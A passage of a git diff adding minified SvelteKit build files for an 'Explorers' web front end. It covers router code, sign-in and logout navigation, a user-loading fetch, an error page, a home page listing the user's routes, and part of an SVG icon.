0&&L===location.href.split("#")[0]){if(d.url.hash===a.hash){n.preventDefault(),(P=o.ownerDocument.getElementById(A))==null||P.scrollIntoView();return}if(D=!0,be(x),e(a),!b.replace_state)return;D=!1,n.preventDefault()}ce({url:a,scroll:b.noscroll?te():null,keepfocus:b.keep_focus??!1,redirect_count:0,details:{state:{},replaceState:b.replace_state??a.href===location.href},accepted:()=>n.preventDefault(),blocked:()=>n.preventDefault(),type:"link"})}),u.addEventListener("submit",n=>{if(n.defaultPrevented)return;const o=HTMLFormElement.prototype.cloneNode.call(n.target),a=n.submitter;if(((a==null?void 0:a.formMethod)||o.method)!=="get")return;const p=new URL((a==null?void 0:a.hasAttribute("formaction"))&&(a==null?void 0:a.formAction)||o.action);if(ye(p,G))return;const v=n.target,{keep_focus:b,noscroll:y,reload:L,replace_state:A}=le(v);if(L)return;n.preventDefault(),n.stopPropagation();const P=new FormData(v),_=a==null?void 0:a.getAttribute("name");_&&P.append(_,(a==null?void 0:a.getAttribute("value"))??""),p.search=new URLSearchParams(P).toString(),ce({url:p,scroll:y?te():null,keepfocus:b??!1,redirect_count:0,details:{state:{},replaceState:A??p.href===location.href},nav_token:{},accepted:()=>{},blocked:()=>{},type:"form"})}),addEventListener("popstate",async n=>{var o;if(W={},(o=n.state)!=null&&o[V]){if(n.state[V]===x)return;const a=J[n.state[V]],c=new URL(location.href);if(d.url.href.split("#")[0]===location.href.split("#")[0]){e(c),J[x]=te(),x=n.state[V],scrollTo(a.x,a.y);return}const p=n.state[V]-x;await ce({url:c,scroll:a,keepfocus:!1,redirect_count:0,details:null,accepted:()=>{x=n.state[V]},blocked:()=>{history.go(-p)},type:"popstate",delta:p,nav_token:W})}else if(!D){const a=new URL(location.href);e(a)}}),addEventListener("hashchange",()=>{D&&(D=!1,history.replaceState({...history.state,[V]:++x},"",location.href))});for(const n of document.querySelectorAll("link"))n.rel==="icon"&&(n.href=n.href);addEventListener("pageshow",n=>{n.persisted&&H.navigating.set(null)});function e(n){d.url=n,H.page.set({...F,url:n}),H.page.notify()}},_hydrate:async({status:e=200,error:s,node_ids:n,params:o,route:a,data:c,form:p})=>{j=!0;const v=new URL(location.href);({params:o={},route:a={id:null}}=Z(v,!1)||{});let b;try{const y=n.map(async(P,_)=>{const w=c[_];return w!=null&&w.uses&&(w.uses=Ye(w.uses)),ue({loader:t.nodes[P],url:v,params:o,route:a,parent:async()=>{const O={};for(let N=0;N<_;N+=1)Object.assign(O,(await y[N]).data);return O},server_data_node:de(w)})}),L=await Promise.all(y),A=f.find(({id:P})=>P===a.id);if(A){const P=A.layouts;for(let _=0;_u?"1":"0").join(""));const i=await Ke(f.href);if((h=i.headers.get("content-type"))!=null&&h.includes("text/html")&&await K(t),!i.ok)throw new ne(i.status,await i.json());return new Promise(async u=>{var j;const E=new Map,l=i.body.getReader(),g=new TextDecoder;function m(T){return Et(T,{Promise:R=>new Promise((C,U)=>{E.set(R,{fulfil:C,reject:U})})})}let d="";for(;;){const{done:T,value:R}=await l.read();if(T&&!d)break;for(d+=!R&&d?` +`:g.decode(R);;){const C=d.indexOf(` +`);if(C===-1)break;const U=JSON.parse(d.slice(0,C));if(d=d.slice(C+1),U.type==="redirect")return u(U);if(U.type==="data")(j=U.nodes)==null||j.forEach(D=>{(D==null?void 0:D.type)==="data"&&(D.uses=Ye(D.uses),D.data=m(D.data))}),u(U);else if(U.type==="chunk"){const{id:D,data:z,error:q}=U,x=E.get(D);E.delete(D),q?x.reject(m(q)):x.fulfil(m(z))}}}})}function Ye(t){return{dependencies:new Set((t==null?void 0:t.dependencies)??[]),params:new Set((t==null?void 0:t.params)??[]),parent:!!(t!=null&&t.parent),route:!!(t!=null&&t.route),url:!!(t!=null&&t.url)}}function Ee(){const t=document.querySelector("[autofocus]");if(t)t.focus();else{const r=document.body,f=r.getAttribute("tabindex");r.tabIndex=-1,r.focus({preventScroll:!0,focusVisible:!1}),f!==null?r.setAttribute("tabindex",f):r.removeAttribute("tabindex");const i=getSelection();if(i&&i.type!=="None"){const h=[];for(let u=0;u{if(i.rangeCount===h.length){for(let u=0;u{h=d,u=j});return E.catch(()=>{}),{navigation:{from:{params:t.params,route:{id:((g=t.route)==null?void 0:g.id)??null},url:t.url},to:f&&{params:(r==null?void 0:r.params)??null,route:{id:((m=r==null?void 0:r.route)==null?void 0:m.id)??null},url:f},willUnload:!r,type:i,complete:E},fulfil:h,reject:u}}async function xt(t,r,f){const i=Lt(t,r);Ze({client:i}),f?await i._hydrate(f):i.goto(location.href,{replaceState:!0}),i._start_router()}export{xt as start}; diff --git a/services/explorers/front/build/_app/immutable/nodes/0.67d342ee.js b/services/explorers/front/build/_app/immutable/nodes/0.67d342ee.js new file mode 100644 index 0000000..e6a8de2 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/0.67d342ee.js @@ -0,0 +1 @@ +import{P as V}from"../chunks/public.550f299c.js";import{s as j,r as D,f as v,a as S,g as h,h as g,u as L,c as w,d as f,j as r,i as m,v as y,w as H,x as U,y as z}from"../chunks/scheduler.1f572272.js";import{S as P,i as B,a as N,t as O}from"../chunks/index.b942bf85.js";const R=!1;async function $({fetch:o}){const t=await o(`${V}/user`,{credentials:"include"});let s=null;try{t.ok&&(s=await t.json())}catch{s=null}return{user:s}}const Y=Object.freeze(Object.defineProperty({__proto__:null,load:$,ssr:R},Symbol.toStringTag,{value:"Module"}));const q=""+new URL("../assets/marker.884e7495.png",import.meta.url).href;function F(o){let t,s="Sign in",n,l,u="Sign Up";return{c(){t=v("a"),t.textContent=s,n=S(),l=v("a"),l.innerHTML=u,this.h()},l(a){t=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-5zsfxw"&&(t.textContent=s),n=w(a),l=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(l)!=="svelte-zar3ip"&&(l.innerHTML=u),this.h()},h(){r(t,"class","button is-light"),r(t,"href","/signin"),r(t,"role","button"),r(l,"class","button is-primary"),r(l,"href","/signup"),r(l,"role","button")},m(a,_){m(a,t,_),m(a,n,_),m(a,l,_)},d(a){a&&(f(t),f(n),f(l))}}}function G(o){let t,s="Logout";return{c(){t=v("a"),t.textContent=s,this.h()},l(n){t=h(n,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-7wlhk2"&&(t.textContent=s),this.h()},h(){r(t,"class","button is-primary"),r(t,"href","/logout"),r(t,"role","button")},m(n,l){m(n,t,l)},d(n){n&&f(t)}}}function J(o){let t,s,n=`

Explorers

`,l,u,a,_,k,b,p;function x(e,c){return e[0].user?G:F}let C=x(o),d=C(o);const E=o[2].default,i=D(E,o,o[1],null);return{c(){t=v("nav"),s=v("div"),s.innerHTML=n,l=S(),u=v("div"),a=v("div"),_=v("div"),d.c(),k=S(),b=v("main"),i&&i.c(),this.h()},l(e){t=h(e,"NAV",{class:!0,role:!0,"aria-label":!0});var c=g(t);s=h(c,"DIV",{class:!0,"data-svelte-h":!0}),L(s)!=="svelte-81k4k6"&&(s.innerHTML=n),l=w(c),u=h(c,"DIV",{class:!0});var A=g(u);a=h(A,"DIV",{class:!0});var I=g(a);_=h(I,"DIV",{class:!0});var M=g(_);d.l(M),M.forEach(f),I.forEach(f),A.forEach(f),c.forEach(f),k=w(e),b=h(e,"MAIN",{});var T=g(b);i&&i.l(T),T.forEach(f),this.h()},h(){r(s,"class","navbar-brand"),r(_,"class","buttons"),r(a,"class","navbar-item"),r(u,"class","navbar-end"),r(t,"class","navbar is-link"),r(t,"role","navigation"),r(t,"aria-label","main navigation")},m(e,c){m(e,t,c),y(t,s),y(t,l),y(t,u),y(u,a),y(a,_),d.m(_,null),m(e,k,c),m(e,b,c),i&&i.m(b,null),p=!0},p(e,[c]){C!==(C=x(e))&&(d.d(1),d=C(e),d&&(d.c(),d.m(_,null))),i&&i.p&&(!p||c&2)&&H(i,E,e,e[1],p?z(E,e[1],c,null):U(e[1]),null)},i(e){p||(N(i,e),p=!0)},o(e){O(i,e),p=!1},d(e){e&&(f(t),f(k),f(b)),d.d(),i&&i.d(e)}}}function K(o,t,s){let{$$slots:n={},$$scope:l}=t,{data:u}=t;return o.$$set=a=>{"data"in a&&s(0,u=a.data),"$$scope"in a&&s(1,l=a.$$scope)},[u,l,n]}class Z extends P{constructor(t){super(),B(this,t,K,J,j,{data:0})}}export{Z as component,Y as universal}; diff --git a/services/explorers/front/build/_app/immutable/nodes/0.901c8284.js b/services/explorers/front/build/_app/immutable/nodes/0.901c8284.js new file mode 100644 index 0000000..5c87d41 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/0.901c8284.js @@ -0,0 +1 @@ +import{P as V}from"../chunks/public.aa8ed6af.js";import{s as j,r as D,f as v,a as S,g as h,h as g,u as L,c as w,d as f,j as r,i as m,v as y,w as H,x as U,y as z}from"../chunks/scheduler.1f572272.js";import{S as P,i as B,a as N,t as O}from"../chunks/index.b942bf85.js";const R=!1;async function $({fetch:o}){const t=await o(`${V}/user`,{credentials:"include"});let s=null;try{t.ok&&(s=await t.json())}catch{s=null}return{user:s}}const Y=Object.freeze(Object.defineProperty({__proto__:null,load:$,ssr:R},Symbol.toStringTag,{value:"Module"}));const q=""+new URL("../assets/marker.884e7495.png",import.meta.url).href;function F(o){let t,s="Sign in",n,l,u="Sign Up";return{c(){t=v("a"),t.textContent=s,n=S(),l=v("a"),l.innerHTML=u,this.h()},l(a){t=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-5zsfxw"&&(t.textContent=s),n=w(a),l=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(l)!=="svelte-zar3ip"&&(l.innerHTML=u),this.h()},h(){r(t,"class","button is-light"),r(t,"href","/signin"),r(t,"role","button"),r(l,"class","button is-primary"),r(l,"href","/signup"),r(l,"role","button")},m(a,_){m(a,t,_),m(a,n,_),m(a,l,_)},d(a){a&&(f(t),f(n),f(l))}}}function G(o){let t,s="Logout";return{c(){t=v("a"),t.textContent=s,this.h()},l(n){t=h(n,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-7wlhk2"&&(t.textContent=s),this.h()},h(){r(t,"class","button is-primary"),r(t,"href","/logout"),r(t,"role","button")},m(n,l){m(n,t,l)},d(n){n&&f(t)}}}function J(o){let t,s,n=`

Explorers

`,l,u,a,_,k,b,p;function x(e,c){return e[0].user?G:F}let C=x(o),d=C(o);const E=o[2].default,i=D(E,o,o[1],null);return{c(){t=v("nav"),s=v("div"),s.innerHTML=n,l=S(),u=v("div"),a=v("div"),_=v("div"),d.c(),k=S(),b=v("main"),i&&i.c(),this.h()},l(e){t=h(e,"NAV",{class:!0,role:!0,"aria-label":!0});var c=g(t);s=h(c,"DIV",{class:!0,"data-svelte-h":!0}),L(s)!=="svelte-81k4k6"&&(s.innerHTML=n),l=w(c),u=h(c,"DIV",{class:!0});var A=g(u);a=h(A,"DIV",{class:!0});var I=g(a);_=h(I,"DIV",{class:!0});var M=g(_);d.l(M),M.forEach(f),I.forEach(f),A.forEach(f),c.forEach(f),k=w(e),b=h(e,"MAIN",{});var T=g(b);i&&i.l(T),T.forEach(f),this.h()},h(){r(s,"class","navbar-brand"),r(_,"class","buttons"),r(a,"class","navbar-item"),r(u,"class","navbar-end"),r(t,"class","navbar is-link"),r(t,"role","navigation"),r(t,"aria-label","main navigation")},m(e,c){m(e,t,c),y(t,s),y(t,l),y(t,u),y(u,a),y(a,_),d.m(_,null),m(e,k,c),m(e,b,c),i&&i.m(b,null),p=!0},p(e,[c]){C!==(C=x(e))&&(d.d(1),d=C(e),d&&(d.c(),d.m(_,null))),i&&i.p&&(!p||c&2)&&H(i,E,e,e[1],p?z(E,e[1],c,null):U(e[1]),null)},i(e){p||(N(i,e),p=!0)},o(e){O(i,e),p=!1},d(e){e&&(f(t),f(k),f(b)),d.d(),i&&i.d(e)}}}function K(o,t,s){let{$$slots:n={},$$scope:l}=t,{data:u}=t;return o.$$set=a=>{"data"in a&&s(0,u=a.data),"$$scope"in a&&s(1,l=a.$$scope)},[u,l,n]}class Z extends P{constructor(t){super(),B(this,t,K,J,j,{data:0})}}export{Z as component,Y as universal}; diff --git a/services/explorers/front/build/_app/immutable/nodes/1.27d5f0f3.js b/services/explorers/front/build/_app/immutable/nodes/1.27d5f0f3.js new file mode 100644 index 0000000..ccf8102 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/1.27d5f0f3.js @@ -0,0 +1 @@ +import{s as S,f as _,l as d,a as x,g as f,h as g,m as h,d as l,c as q,i as m,v,n as $,z as E,A as y}from"../chunks/scheduler.1f572272.js";import{S as z,i as A}from"../chunks/index.b942bf85.js";import{d as C}from"../chunks/singletons.1951defa.js";const H=()=>{const s=C;return{page:{subscribe:s.page.subscribe},navigating:{subscribe:s.navigating.subscribe},updated:s.updated}},P={subscribe(s){return H().page.subscribe(s)}};function j(s){var b;let t,r=s[0].status+"",o,n,i,c=((b=s[0].error)==null?void 0:b.message)+"",u;return{c(){t=_("h1"),o=d(r),n=x(),i=_("p"),u=d(c)},l(e){t=f(e,"H1",{});var a=g(t);o=h(a,r),a.forEach(l),n=q(e),i=f(e,"P",{});var p=g(i);u=h(p,c),p.forEach(l)},m(e,a){m(e,t,a),v(t,o),m(e,n,a),m(e,i,a),v(i,u)},p(e,[a]){var p;a&1&&r!==(r=e[0].status+"")&&$(o,r),a&1&&c!==(c=((p=e[0].error)==null?void 0:p.message)+"")&&$(u,c)},i:E,o:E,d(e){e&&(l(t),l(n),l(i))}}}function k(s,t,r){let o;return y(s,P,n=>r(0,o=n)),[o]}let F=class extends z{constructor(t){super(),A(this,t,k,j,S,{})}};export{F as component}; diff --git a/services/explorers/front/build/_app/immutable/nodes/1.2db1d768.js b/services/explorers/front/build/_app/immutable/nodes/1.2db1d768.js new file mode 100644 index 0000000..6df545e --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/1.2db1d768.js @@ -0,0 +1 @@ +import{s as S,f as _,l as d,a as x,g as f,h as g,m as h,d as l,c as q,i as m,v,n as $,z as E,A as y}from"../chunks/scheduler.1f572272.js";import{S as z,i as A}from"../chunks/index.b942bf85.js";import{d as C}from"../chunks/singletons.27fcd387.js";const H=()=>{const s=C;return{page:{subscribe:s.page.subscribe},navigating:{subscribe:s.navigating.subscribe},updated:s.updated}},P={subscribe(s){return H().page.subscribe(s)}};function j(s){var b;let t,r=s[0].status+"",o,n,i,c=((b=s[0].error)==null?void 0:b.message)+"",u;return{c(){t=_("h1"),o=d(r),n=x(),i=_("p"),u=d(c)},l(e){t=f(e,"H1",{});var a=g(t);o=h(a,r),a.forEach(l),n=q(e),i=f(e,"P",{});var p=g(i);u=h(p,c),p.forEach(l)},m(e,a){m(e,t,a),v(t,o),m(e,n,a),m(e,i,a),v(i,u)},p(e,[a]){var p;a&1&&r!==(r=e[0].status+"")&&$(o,r),a&1&&c!==(c=((p=e[0].error)==null?void 0:p.message)+"")&&$(u,c)},i:E,o:E,d(e){e&&(l(t),l(n),l(i))}}}function k(s,t,r){let o;return y(s,P,n=>r(0,o=n)),[o]}let F=class extends z{constructor(t){super(),A(this,t,k,j,S,{})}};export{F as component}; diff --git a/services/explorers/front/build/_app/immutable/nodes/2.bf5bf864.js b/services/explorers/front/build/_app/immutable/nodes/2.bf5bf864.js new file mode 100644 index 0000000..251cdca --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/2.bf5bf864.js @@ -0,0 +1 @@ +import{s as P,f as m,a as E,g as p,h as k,c as I,u as L,d as u,j as g,B,i as y,v as _,z as C,C as W,o as G,l as S,m as $,n as F,e as U,k as J}from"../chunks/scheduler.1f572272.js";import{S as V,i as z,a as j,t as q,b as K,d as Q,m as X,e as Y}from"../chunks/index.b942bf85.js";import{P as Z}from"../chunks/public.aa8ed6af.js";import{e as ee}from"../chunks/edit.a04a5399.js";function H(n){return(n==null?void 0:n.length)!==void 0?n:Array.from(n)}async function te({fetch:n,parent:e}){return await e(),{}}const ge=Object.freeze(Object.defineProperty({__proto__:null,load:te},Symbol.toStringTag,{value:"Module"})),N=""+new URL("../assets/world.bab3a2dd.png",import.meta.url).href;function D(n,e,s){const t=n.slice();return t[1]=e[s],t}function O(n){let e,s,t=n[1].title+"",l,c;return{c(){e=m("p"),s=m("a"),l=S(t),this.h()},l(i){e=p(i,"P",{});var r=k(e);s=p(r,"A",{href:!0});var v=k(s);l=$(v,t),v.forEach(u),r.forEach(u),this.h()},h(){g(s,"href",c="/route/"+n[1].id)},m(i,r){y(i,e,r),_(e,s),_(s,l)},p(i,r){r&1&&t!==(t=i[1].title+"")&&F(l,t),r&1&&c!==(c="/route/"+i[1].id)&&g(s,"href",c)},d(i){i&&u(e)}}}function se(n){let e,s,t,l,c,i="Routes created by you:",r,v,f=H(n[0]),a=[];for(let h=0;h{const c=await(await fetch(`${Z}/route`,{credentials:"include"})).json();s(0,t=c)}),n.$$set=l=>{"routes"in l&&s(0,t=l.routes)},[t]}class ie extends V{constructor(e){super(),z(this,e,le,se,P,{routes:0})}}const ne=""+new URL("../assets/file-upload.156694fe.png",import.meta.url).href,ae=""+new URL("../assets/share.f4c802a8.png",import.meta.url).href;function ce(n){let e,s;return{c(){e=m("p"),s=S(n[1]),this.h()},l(t){e=p(t,"P",{style:!0});var l=k(e);s=$(l,n[1]),l.forEach(u),this.h()},h(){J(e,"color","red")},m(t,l){y(t,e,l),_(e,s)},p:C,d(t){t&&u(e)}}}function re(n){let e,s='Welcome to the "Explorers" service!';return{c(){e=m("h3"),e.textContent=s,this.h()},l(t){e=p(t,"H3",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1fzjqit"&&(e.textContent=s),this.h()},h(){g(e,"class","title is-3")},m(t,l){y(t,e,l)},p:C,d(t){t&&u(e)}}}function oe(n){let e,s,t=n[0].username+"",l,c;return{c(){e=m("h2"),s=S("Welcome back, "),l=S(t),c=S("!"),this.h()},l(i){e=p(i,"H2",{class:!0});var r=k(e);s=$(r,"Welcome back, "),l=$(r,t),c=$(r,"!"),r.forEach(u),this.h()},h(){g(e,"class","title is-3")},m(i,r){y(i,e,r),_(e,s),_(e,l),_(e,c)},p:C,d(i){i&&u(e)}}}function de(n){let e,s=``,t,l,c='

Ready to start?

';return{c(){e=m("section"),e.innerHTML=s,t=E(),l=m("section"),l.innerHTML=c,this.h()},l(i){e=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1xgemfr"&&(e.innerHTML=s),t=I(i),l=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(l)!=="svelte-1u36zsb"&&(l.innerHTML=c),this.h()},h(){g(e,"class","section"),g(l,"class","section")},m(i,r){y(i,e,r),y(i,t,r),y(i,l,r)},i:C,o:C,d(i){i&&(u(e),u(t),u(l))}}}function ue(n){let e,s,t,l,c,i,r='',v;return l=new ie({}),{c(){e=m("section"),s=m("div"),t=m("div"),K(l.$$.fragment),c=E(),i=m("div"),i.innerHTML=r,this.h()},l(f){e=p(f,"SECTION",{class:!0});var a=k(e);s=p(a,"DIV",{class:!0});var h=k(s);t=p(h,"DIV",{class:!0});var b=k(t);Q(l.$$.fragment,b),b.forEach(u),h.forEach(u),c=I(a),i=p(a,"DIV",{class:!0,"data-svelte-h":!0}),L(i)!=="svelte-1fi6orn"&&(i.innerHTML=r),a.forEach(u),this.h()},h(){g(t,"class","column is-half has-text-centered"),g(s,"class","columns is-centered"),g(i,"class","columns is-centered"),g(e,"class","section")},m(f,a){y(f,e,a),_(e,s),_(s,t),X(l,t,null),_(e,c),_(e,i),v=!0},i(f){v||(j(l.$$.fragment,f),v=!0)},o(f){q(l.$$.fragment,f),v=!1},d(f){f&&u(e),Y(l)}}}function he(n){let e,s,t,l,c,i,r,v,f,a=n[1]&&ce(n);function h(d,x){return d[0]?oe:re}let o=h(n)(n);const w=[ue,de],T=[];function A(d,x){return d[0]?0:1}return i=A(n),r=T[i]=w[i](n),{c(){a&&a.c(),e=E(),s=m("section"),t=m("div"),l=m("div"),o.c(),c=E(),r.c(),v=U(),this.h()},l(d){a&&a.l(d),e=I(d),s=p(d,"SECTION",{class:!0});var x=k(s);t=p(x,"DIV",{class:!0});var M=k(t);l=p(M,"DIV",{class:!0});var R=k(l);o.l(R),R.forEach(u),M.forEach(u),x.forEach(u),c=I(d),r.l(d),v=U(),this.h()},h(){g(l,"class","column is-half has-text-centered"),g(t,"class","columns is-centered"),g(s,"class","section")},m(d,x){a&&a.m(d,x),y(d,e,x),y(d,s,x),_(s,t),_(t,l),o.m(l,null),y(d,c,x),T[i].m(d,x),y(d,v,x),f=!0},p(d,[x]){d[1]&&a.p(d,x),o.p(d,x)},i(d){f||(j(r),f=!0)},o(d){q(r),f=!1},d(d){d&&(u(e),u(s),u(c),u(v)),a&&a.d(d),o.d(),T[i].d(d)}}}function fe(n,e,s){let{data:t}=e,l=t.user,c;return n.$$set=i=>{"data"in i&&s(2,t=i.data)},[l,c,t]}class be extends V{constructor(e){super(),z(this,e,fe,he,P,{data:2})}}export{be as component,ge as universal}; diff --git a/services/explorers/front/build/_app/immutable/nodes/2.f4d2973c.js b/services/explorers/front/build/_app/immutable/nodes/2.f4d2973c.js new file mode 100644 index 0000000..eb0b11a --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/2.f4d2973c.js @@ -0,0 +1 @@ +import{s as P,f as m,a as E,g as p,h as k,c as I,u as L,d as u,j as g,B,i as y,v as _,z as C,C as W,o as G,l as S,m as $,n as F,e as U,k as J}from"../chunks/scheduler.1f572272.js";import{S as V,i as z,a as j,t as q,b as K,d as Q,m as X,e as Y}from"../chunks/index.b942bf85.js";import{P as Z}from"../chunks/public.550f299c.js";import{e as ee}from"../chunks/edit.a04a5399.js";function H(n){return(n==null?void 0:n.length)!==void 0?n:Array.from(n)}async function te({fetch:n,parent:e}){return await e(),{}}const ge=Object.freeze(Object.defineProperty({__proto__:null,load:te},Symbol.toStringTag,{value:"Module"})),N=""+new URL("../assets/world.bab3a2dd.png",import.meta.url).href;function D(n,e,s){const t=n.slice();return t[1]=e[s],t}function O(n){let e,s,t=n[1].title+"",l,c;return{c(){e=m("p"),s=m("a"),l=S(t),this.h()},l(i){e=p(i,"P",{});var r=k(e);s=p(r,"A",{href:!0});var v=k(s);l=$(v,t),v.forEach(u),r.forEach(u),this.h()},h(){g(s,"href",c="/route/"+n[1].id)},m(i,r){y(i,e,r),_(e,s),_(s,l)},p(i,r){r&1&&t!==(t=i[1].title+"")&&F(l,t),r&1&&c!==(c="/route/"+i[1].id)&&g(s,"href",c)},d(i){i&&u(e)}}}function se(n){let e,s,t,l,c,i="Routes created by you:",r,v,f=H(n[0]),a=[];for(let h=0;h{const c=await(await fetch(`${Z}/route`,{credentials:"include"})).json();s(0,t=c)}),n.$$set=l=>{"routes"in l&&s(0,t=l.routes)},[t]}class ie extends V{constructor(e){super(),z(this,e,le,se,P,{routes:0})}}const ne=""+new URL("../assets/file-upload.156694fe.png",import.meta.url).href,ae=""+new URL("../assets/share.f4c802a8.png",import.meta.url).href;function ce(n){let e,s;return{c(){e=m("p"),s=S(n[1]),this.h()},l(t){e=p(t,"P",{style:!0});var l=k(e);s=$(l,n[1]),l.forEach(u),this.h()},h(){J(e,"color","red")},m(t,l){y(t,e,l),_(e,s)},p:C,d(t){t&&u(e)}}}function re(n){let e,s='Welcome to the "Explorers" service!';return{c(){e=m("h3"),e.textContent=s,this.h()},l(t){e=p(t,"H3",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1fzjqit"&&(e.textContent=s),this.h()},h(){g(e,"class","title is-3")},m(t,l){y(t,e,l)},p:C,d(t){t&&u(e)}}}function oe(n){let e,s,t=n[0].username+"",l,c;return{c(){e=m("h2"),s=S("Welcome back, "),l=S(t),c=S("!"),this.h()},l(i){e=p(i,"H2",{class:!0});var r=k(e);s=$(r,"Welcome back, "),l=$(r,t),c=$(r,"!"),r.forEach(u),this.h()},h(){g(e,"class","title is-3")},m(i,r){y(i,e,r),_(e,s),_(e,l),_(e,c)},p:C,d(i){i&&u(e)}}}function de(n){let e,s=``,t,l,c='

Ready to start?

';return{c(){e=m("section"),e.innerHTML=s,t=E(),l=m("section"),l.innerHTML=c,this.h()},l(i){e=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1xgemfr"&&(e.innerHTML=s),t=I(i),l=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(l)!=="svelte-1u36zsb"&&(l.innerHTML=c),this.h()},h(){g(e,"class","section"),g(l,"class","section")},m(i,r){y(i,e,r),y(i,t,r),y(i,l,r)},i:C,o:C,d(i){i&&(u(e),u(t),u(l))}}}function ue(n){let e,s,t,l,c,i,r='',v;return l=new ie({}),{c(){e=m("section"),s=m("div"),t=m("div"),K(l.$$.fragment),c=E(),i=m("div"),i.innerHTML=r,this.h()},l(f){e=p(f,"SECTION",{class:!0});var a=k(e);s=p(a,"DIV",{class:!0});var h=k(s);t=p(h,"DIV",{class:!0});var b=k(t);Q(l.$$.fragment,b),b.forEach(u),h.forEach(u),c=I(a),i=p(a,"DIV",{class:!0,"data-svelte-h":!0}),L(i)!=="svelte-1fi6orn"&&(i.innerHTML=r),a.forEach(u),this.h()},h(){g(t,"class","column is-half has-text-centered"),g(s,"class","columns is-centered"),g(i,"class","columns is-centered"),g(e,"class","section")},m(f,a){y(f,e,a),_(e,s),_(s,t),X(l,t,null),_(e,c),_(e,i),v=!0},i(f){v||(j(l.$$.fragment,f),v=!0)},o(f){q(l.$$.fragment,f),v=!1},d(f){f&&u(e),Y(l)}}}function he(n){let e,s,t,l,c,i,r,v,f,a=n[1]&&ce(n);function h(d,x){return d[0]?oe:re}let o=h(n)(n);const w=[ue,de],T=[];function A(d,x){return d[0]?0:1}return i=A(n),r=T[i]=w[i](n),{c(){a&&a.c(),e=E(),s=m("section"),t=m("div"),l=m("div"),o.c(),c=E(),r.c(),v=U(),this.h()},l(d){a&&a.l(d),e=I(d),s=p(d,"SECTION",{class:!0});var x=k(s);t=p(x,"DIV",{class:!0});var M=k(t);l=p(M,"DIV",{class:!0});var R=k(l);o.l(R),R.forEach(u),M.forEach(u),x.forEach(u),c=I(d),r.l(d),v=U(),this.h()},h(){g(l,"class","column is-half has-text-centered"),g(t,"class","columns is-centered"),g(s,"class","section")},m(d,x){a&&a.m(d,x),y(d,e,x),y(d,s,x),_(s,t),_(t,l),o.m(l,null),y(d,c,x),T[i].m(d,x),y(d,v,x),f=!0},p(d,[x]){d[1]&&a.p(d,x),o.p(d,x)},i(d){f||(j(r),f=!0)},o(d){q(r),f=!1},d(d){d&&(u(e),u(s),u(c),u(v)),a&&a.d(d),o.d(),T[i].d(d)}}}function fe(n,e,s){let{data:t}=e,l=t.user,c;return n.$$set=i=>{"data"in i&&s(2,t=i.data)},[l,c,t]}class be extends V{constructor(e){super(),z(this,e,fe,he,P,{data:2})}}export{be as component,ge as universal}; diff --git a/services/explorers/front/build/_app/immutable/nodes/3.04c11af8.js b/services/explorers/front/build/_app/immutable/nodes/3.04c11af8.js new file mode 100644 index 0000000..a1f725c --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/3.04c11af8.js @@ -0,0 +1 @@ +import{s as se,D as R,E as V,F as z,h as g,d as h,j as u,k as c,G as X,i as j,v as d,H as b,z as Y,I as ne,J as $,K as ee,L as I,f as k,a as H,g as w,c as O,u as U,M as ie,l as re,m as oe,n as ce}from"../chunks/scheduler.1f572272.js";import{S as le,i as ae,b as ue,d as de,m as he,a as fe,t as me,e as ve}from"../chunks/index.b942bf85.js";import{g as _e,i as pe}from"../chunks/navigation.872e8737.js";import{e as ge}from"../chunks/edit.a04a5399.js";import{g as ke}from"../chunks/spread.84d39b6c.js";import{P as we}from"../chunks/public.aa8ed6af.js";function ye(t){let e,l,s,n,o,m,f,E,_=[{xmlns:"http://www.w3.org/2000/svg"},{viewBox:"0 0 512 512"},t[3],{role:t[1]},{width:t[0]},{height:t[0]},{fill:t[2]},{class:m=t[4].class}],y={};for(let i=0;i<_.length;i+=1)y=R(y,_[i]);return{c(){e=V("svg"),l=V("polyline"),s=V("line"),n=V("path"),o=V("path"),this.h()},l(i){e=z(i,"svg",{xmlns:!0,viewBox:!0,role:!0,width:!0,height:!0,fill:!0,class:!0});var r=g(e);l=z(r,"polyline",{points:!0,style:!0}),g(l).forEach(h),s=z(r,"line",{x1:!0,y1:!0,x2:!0,y2:!0,style:!0}),g(s).forEach(h),n=z(r,"path",{d:!0,style:!0}),g(n).forEach(h),o=z(r,"path",{d:!0,style:!0}),g(o).forEach(h),r.forEach(h),this.h()},h(){u(l,"points","32 415.5 152 95.5 272 415.5"),c(l,"fill","none"),c(l,"stroke",t[2]),c(l,"stroke-linecap","round"),c(l,"stroke-linejoin","round"),c(l,"stroke-width","32px"),u(s,"x1","230"),u(s,"y1","303.5"),u(s,"x2","74"),u(s,"y2","303.5"),c(s,"fill","none"),c(s,"stroke",t[2]),c(s,"stroke-linecap","round"),c(s,"stroke-linejoin","round"),c(s,"stroke-width","32px"),u(n,"d","M326,239.5c12.19-28.69,41-48,74-48h0c46,0,80,32,80,80v144"),c(n,"fill","none"),c(n,"stroke",t[2]),c(n,"stroke-linecap","round"),c(n,"stroke-linejoin","round"),c(n,"stroke-width","32px"),u(o,"d","M320,358.5c0,36,26.86,58,60,58,54,0,100-27,100-106v-15c-20,0-58,1-92,5C355.23,304.36,320,319.5,320,358.5Z"),c(o,"fill","none"),c(o,"stroke",t[2]),c(o,"stroke-linecap","round"),c(o,"stroke-linejoin","round"),c(o,"stroke-width","32px"),X(e,y)},m(i,r){j(i,e,r),d(e,l),d(e,s)